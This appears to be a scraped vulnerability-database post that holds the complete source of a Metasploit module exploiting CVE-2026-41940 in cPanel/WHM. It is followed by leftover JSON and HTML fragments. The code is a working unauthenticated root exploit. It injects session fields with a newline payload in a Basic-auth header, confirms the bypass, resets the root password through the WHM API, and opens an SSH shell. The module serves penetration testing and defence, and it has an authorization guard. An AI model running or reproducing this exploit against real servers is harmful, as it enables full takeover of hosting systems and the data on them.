{“lastseen”:”2026-05-18T19:28:13″,”description”:”Exploits CVE-2026-41940, a CRLF injection in cPanel\/WHM’s cpsrvd daemon that allows unauthenticated remote code execution as root. The Basic-auth handler writes the password to the raw session file without stripping newlines. Omitting the ob-part of…”,”published”:”2026-05-18T19:02:36″,”modified”:”2026-05-18T19:02:36″,”type”:”metasploit”,”title”:”cPanel\/WHM CRLF Injection Authentication Bypass RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-CPANEL_WHM_AUTH_BYPASS_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-41940″],”sourceData”:”# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘net\/ssh’\\nrequire ‘net\/ssh\/command_stream’\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::Remote::SSH\\n include Msf::Exploit::Retry\\n include Msf::Auxiliary::Report\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘cPanel\/WHM CRLF Injection Authentication Bypass RCE’,\\n ‘Description’ =\\u003e %q{\\n Exploits CVE-2026-41940, a CRLF injection in cPanel\/WHM’s cpsrvd daemon\\n that allows unauthenticated remote code execution as root.\\n\\n The Basic-auth handler writes the password to the raw session file without\\n stripping newlines. Omitting the ob-part of the session cookie bypasses the\\n encoder, so injected fields land verbatim in the raw file. A subsequent\\n request to \/scripts2\/listaccts triggers Cpanel::Session::Modify to promote\\n those fields into the authoritative session cache, granting root WHM access.\\n\\n RCE uses the WHM JSON API passwd endpoint to set a temporary root password,\\n then delivers the payload over SSH. The password is rotated after exploitation.\\n This module does not restore the original root password.\\n\\n Affects all versions after 11.40. Fixed per branch: 11.86.0.41, 11.110.0.97,\\n 11.118.0.63, 11.124.0.35, 11.126.0.54, 11.130.0.19, 11.132.0.29, 11.134.0.20,\\n 11.136.0.5 (cPanel\/WHM) and 136.1.7 (WP2).\\n },\\n ‘Author’ =\\u003e [\\n ‘Sina Kheirkhah’, # Initial analysis and PoC (watchTowr)\\n ‘Adam Kues’, # High-fidelity check technique (SLC Cyber)\\n ‘Shubham Shah’, # High-fidelity check technique (SLC Cyber)\\n ‘Crypto-Cat’, # Metasploit module (Rapid7)\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-41940’],\\n [‘URL’, ‘https:\/\/support.cpanel.net\/hc\/en-us\/articles\/40073787579671’],\\n [‘URL’, ‘https:\/\/labs.watchtowr.com\/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940\/’],\\n [‘URL’, ‘https:\/\/slcyber.io\/research-center\/high-fidelity-check-for-the-cpanel-authentication-bypass-cve-2026-41940\/’],\\n [‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/etr-cve-2026-41940-cpanel-whm-authentication-bypass\/’],\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-04-28’,\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Payload’ =\\u003e {\\n ‘Compat’ =\\u003e {\\n ‘PayloadType’ =\\u003e ‘cmd_interact’,\\n ‘ConnectionType’ =\\u003e ‘find’\\n }\\n },\\n ‘Privileged’ =\\u003e true,\\n ‘Targets’ =\\u003e [\\n [‘Automatic’, {}],\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 2087,\\n ‘SSL’ =\\u003e true\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, CONFIG_CHANGES]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘WHM base path’, ‘\/’]),\\n OptPort.new(‘SSHPORT’, [true, ‘SSH port on the target’, 22])\\n ])\\n\\n register_advanced_options([\\n OptBool.new(‘DefangedMode’, [true, ‘Run in defanged mode’, true]),\\n OptInt.new(‘VerifyTimeout’, [true, ‘Seconds to wait for auth bypass to be confirmed after session cache promotion’, 10])\\n ])\\n end\\n\\n def mint_session\\n # Random username avoids cpHulk lockout; any user works on WHM for session minting\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘login’),\\n ‘vars_get’ =\\u003e { ‘login_only’ =\\u003e ‘1’ },\\n ‘vars_post’ =\\u003e { ‘user’ =\\u003e Rex::Text.rand_text_alpha(8), ‘pass’ =\\u003e Rex::Text.rand_text_alpha(12) }\\n )\\n fail_with(Failure::Unreachable, ‘No response from \/login’) unless res\\n\\n # MSF joins multiple Set-Cookie headers into one string; use get_cookies\\n m = res.get_cookies.match(\/(?:\\\\A|;\\\\s*)whostmgrsession=([^;,\\\\s]+)\/i)\\n fail_with(Failure::UnexpectedReply, ‘No whostmgrsession cookie in \/login response’) unless m\\n\\n session_name = Rex::Text.uri_decode(m[1]).split(‘,’, 2).first\\n vprint_status(\\”Session name: #{session_name}\\”)\\n session_name\\n end\\n\\n def inject_session_fields(session_name)\\n # \\\\xff prefix bypasses set_pass() \\\\x00 check; LF-only separates injected fields\\n raw_creds = \\”root:\\\\xff\\\\nsuccessful_internal_auth_with_timestamp=9999999999\\\\nuser=root\\\\ntfa_verified=1\\\\nhasroot=1\\”\\n cookie_enc = Rex::Text.uri_encode(session_name)\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘headers’ =\\u003e {\\n ‘Authorization’ =\\u003e \\”Basic #{Rex::Text.encode_base64(raw_creds)}\\”,\\n ‘Cookie’ =\\u003e \\”whostmgrsession=#{cookie_enc}\\”\\n }\\n )\\n fail_with(Failure::Unreachable, ‘No response from \/’) unless res\\n\\n m = res.headers[‘Location’].to_s.match(%r{(\/cpsess\\\\d{10})})\\n fail_with(Failure::NotVulnerable, \\”No \/cpsessXXXX token in redirect (HTTP #{res.code}). Target may be patched.\\”) unless m\\n\\n vprint_status(\\”Security token: #{m[1]}\\”)\\n m[1]\\n end\\n\\n def promote_session_cache(session_name)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘scripts2’, ‘listaccts’),\\n ‘headers’ =\\u003e { ‘Cookie’ =\\u003e \\”whostmgrsession=#{Rex::Text.uri_encode(session_name)}\\” }\\n )\\n fail_with(Failure::Unreachable, ‘No response from \/scripts2\/listaccts’) unless res\\n fail_with(Failure::UnexpectedReply, \\”Unexpected response from listaccts (HTTP #{res.code})\\”) unless res.code == 401\\n\\n vprint_status(‘Session fields promoted to cache’)\\n end\\n\\n def verify_auth_bypass(session_name, token)\\n # Retry until \/json-api\/version confirms auth or VerifyTimeout is reached.\\n # do_token_denied promotes the raw session fields to the JSON cache asynchronously;\\n # the first attempt may arrive before cpsrvd finishes writing the JSON cache file.\\n retry_until_truthy(timeout: datastore[‘VerifyTimeout’]) do\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, token, ‘json-api’, ‘version’),\\n ‘headers’ =\\u003e { ‘Cookie’ =\\u003e \\”whostmgrsession=#{Rex::Text.uri_encode(session_name)}\\” }\\n )\\n res\\u0026.code == 200 \\u0026\\u0026 res.body.to_s.include?(‘\\”version\\”‘)\\n end\\n end\\n\\n def whm_api_call(session_name, token, function, params = {})\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, token, ‘json-api’, function),\\n ‘vars_get’ =\\u003e { ‘api.version’ =\\u003e ‘1’ },\\n ‘vars_post’ =\\u003e params,\\n ‘headers’ =\\u003e { ‘Cookie’ =\\u003e \\”whostmgrsession=#{Rex::Text.uri_encode(session_name)}\\” }\\n )\\n fail_with(Failure::Unreachable, \\”No response from json-api\/#{function}\\”) unless res\\n\\n res\\n end\\n\\n def check\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘login’),\\n ‘vars_get’ =\\u003e { ‘login_only’ =\\u003e ‘1’ },\\n ‘vars_post’ =\\u003e { ‘user’ =\\u003e Rex::Text.rand_text_alpha(8), ‘pass’ =\\u003e Rex::Text.rand_text_alpha(12) }\\n )\\n return CheckCode::Unknown(‘No response from \/login’) unless res\\n\\n m = res.get_cookies.match(\/(?:\\\\A|;\\\\s*)whostmgrsession=([^;,\\\\s]+)\/i)\\n return CheckCode::Unknown(‘No whostmgrsession cookie from \/login’) unless m\\n\\n cookie_full_raw = m[1]\\n session_name = Rex::Text.uri_decode(cookie_full_raw).split(‘,’, 2).first\\n\\n # Inject expired=1 for a throwaway user to avoid lockout risk\\n b64 = Rex::Text.encode_base64(\\”u#{Rex::Text.rand_text_hex(10)}:\\\\xff\\\\nexpired=1\\”)\\n\\n res2 = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘headers’ =\\u003e {\\n ‘Authorization’ =\\u003e \\”Basic #{b64}\\”,\\n ‘Cookie’ =\\u003e \\”whostmgrsession=#{Rex::Text.uri_encode(session_name)}\\”\\n }\\n )\\n return CheckCode::Detected(‘Service is running but injection endpoint did not respond’) unless res2\\n\\n m2 = res2.headers[‘Location’].to_s.match(%r{(\/cpsess\\\\d{10})})\\n return CheckCode::Safe(‘No cpsess token – injection did not land’) unless m2\\n\\n # On a vulnerable target the injected expired=1 surfaces in the session page body\\n res3 = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, m2[1], ‘\/’),\\n ‘headers’ =\\u003e { ‘Cookie’ =\\u003e \\”whostmgrsession=#{cookie_full_raw}\\” }\\n )\\n return CheckCode::Detected(‘Service is running and injection landed (cpsess token obtained), but verification request did not respond’) unless res3\\n\\n body = res3.body.to_s\\n if body.include?(‘msg_code:[expired_session]’)\\n return CheckCode::Vulnerable(‘CRLF injection confirmed: expired_session marker detected’)\\n end\\n\\n CheckCode::Safe(‘Injection payload was filtered – target appears patched’)\\n end\\n\\n def exploit\\n if datastore[‘DefangedMode’]\\n fail_with(Failure::BadConfig, \\u003c\\u003c~MSG.squish)\\n This module permanently changes the root password on the target system\\n and does not restore the original value. Set DefangedMode to false if\\n you have authorization to proceed.\\n MSG\\n end\\n\\n tmp_pass = Rex::Text.rand_text_alphanumeric(16) + ‘!aA1’\\n\\n print_status(‘Minting pre-auth session’)\\n session_name = mint_session\\n\\n print_status(‘Injecting session fields via CRLF’)\\n token = inject_session_fields(session_name)\\n\\n print_status(‘Triggering session cache promotion’)\\n promote_session_cache(session_name)\\n\\n print_status(‘Verifying WHM root access’)\\n fail_with(Failure::NotVulnerable, ‘Auth bypass failed’) unless verify_auth_bypass(session_name, token)\\n print_good(‘Auth bypass successful – root WHM session obtained’)\\n\\n report_vuln(\\n host: rhost,\\n port: rport,\\n proto: ‘tcp’,\\n name: ‘cPanel\/WHM CRLF Injection Authentication Bypass (CVE-2026-41940)’,\\n info: ‘Unauthenticated root WHM session via CRLF injection in cpsrvd session handling’,\\n refs: references\\n )\\n\\n print_status(‘Setting temporary root password’)\\n res = whm_api_call(session_name, token, ‘passwd’, ‘user’ =\\u003e ‘root’, ‘password’ =\\u003e tmp_pass)\\n body = res.body.to_s\\n passwd_json = nil\\n begin\\n passwd_json = res.get_json_document\\n rescue StandardError\\n nil\\n end\\n\\n if res.code == 500 \\u0026\\u0026 body.include?(‘License’)\\n fail_with(Failure::NoAccess, ‘WHM passwd API requires a valid cPanel license’)\\n end\\n\\n # cPanel versions have two different passwd API response formats:\\n # – Older versions: {\\”status\\”: 1, …}\\n # – Newer versions: {\\”metadata\\”: {\\”result\\”: 1}, …}\\n # Accept either to maintain compatibility across versions.\\n passwd_ok = passwd_json\\u0026.[](‘status’) == 1 || passwd_json\\u0026.dig(‘metadata’, ‘result’) == 1\\n unless res.code == 200 \\u0026\\u0026 passwd_ok\\n fail_with(Failure::UnexpectedReply, \\”passwd API returned HTTP #{res.code}: #{body[0..200]}\\”)\\n end\\n @tmp_pass_set = true\\n print_good(‘Root password set’)\\n\\n print_status(‘Connecting via SSH’)\\n ssh = nil\\n begin\\n ::Timeout.timeout(datastore[‘SSH_TIMEOUT’]) do\\n ssh = Net::SSH.start(rhost, ‘root’, ssh_client_defaults.merge(\\n auth_methods: [‘password’],\\n password: tmp_pass,\\n port: datastore[‘SSHPORT’]\\n ))\\n end\\n rescue ::Net::SSH::AuthenticationFailed =\\u003e e\\n restore_passwd(session_name, token)\\n fail_with(Failure::NoAccess, \\”SSH authentication failed: #{e.message}\\”)\\n rescue ::Net::SSH::Exception, ::Timeout::Error, ::EOFError =\\u003e e\\n restore_passwd(session_name, token)\\n fail_with(Failure::Unreachable, \\”SSH connection failed: #{e.message}\\”)\\n end\\n\\n # Use the SSH channel directly as the session.\\n # handler(conn.lsock) must be the LAST call – it notifies the session waiter\\n # event that ExploitDriver polls after exploit() returns.\\n conn = Net::SSH::CommandStream.new(ssh, logger: self)\\n\\n # Rotate the temporary password before handing off to the session.\\n # This ensures the temp cred is short-lived even if the operator never\\n # backgrounds the shell.\\n if @tmp_pass_set\\n print_status(‘Rotating root password’)\\n new_pass = Rex::Text.rand_text_alphanumeric(20) + ‘!aA1’\\n rotated = false\\n begin\\n whm_api_call(session_name, token, ‘passwd’, ‘user’ =\\u003e ‘root’, ‘password’ =\\u003e new_pass)\\n print_good(‘Root password rotated’)\\n @tmp_pass_set = false\\n rotated = true\\n rescue StandardError\\n # If the passwd call fails (likely due to session expiration before rotation),\\n # re-exploit to get a fresh auth bypass session and retry rotation.\\n begin\\n sn2 = mint_session\\n tok2 = inject_session_fields(sn2)\\n promote_session_cache(sn2)\\n whm_api_call(sn2, tok2, ‘passwd’, ‘user’ =\\u003e ‘root’, ‘password’ =\\u003e new_pass)\\n print_good(‘Root password rotated’)\\n @tmp_pass_set = false\\n rotated = true\\n rescue StandardError =\\u003e e\\n print_warning(\\”Could not rotate root password: #{e.message}\\”)\\n print_warning(‘Root password may still be set to the temporary value’)\\n end\\n end\\n\\n # Store credential separately so a database error does not trigger re-exploitation.\\n # origin_type :service is required by create_credential_and_login when service_data\\n # is explicitly provided.\\n if rotated\\n begin\\n store_valid_credential(\\n user: ‘root’,\\n private: new_pass,\\n service_data: {\\n origin_type: :service,\\n address: rhost,\\n port: datastore[‘SSHPORT’],\\n service_name: ‘ssh’,\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n )\\n rescue StandardError =\\u003e e\\n vprint_warning(\\”Could not save credential to database: #{e.message}\\”)\\n end\\n end\\n end\\n\\n handler(conn.lsock)\\n ensure\\n # If an exception was raised after password change but before session opens,\\n # warn the operator that temporary credentials may still be active.\\n if @tmp_pass_set\\n print_warning(‘Root password may still be set to the temporary value’)\\n end\\n end\\n\\n private\\n\\n def restore_passwd(session_name, token)\\n whm_api_call(session_name, token, ‘passwd’,\\n ‘user’ =\\u003e ‘root’, ‘password’ =\\u003e Rex::Text.rand_text_alphanumeric(20) + ‘!aA1’)\\n rescue StandardError\\n nil\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/cpanel_whm_auth_bypass_rce.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/cpanel_whm_auth_bypass_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-18T19:28:13″,”description”:”Exploits CVE-2026-41940, a CRLF injection in cPanel\/WHM’s cpsrvd daemon that allows unauthenticated remote code execution as root. The Basic-auth handler writes the password to the…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-55360","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n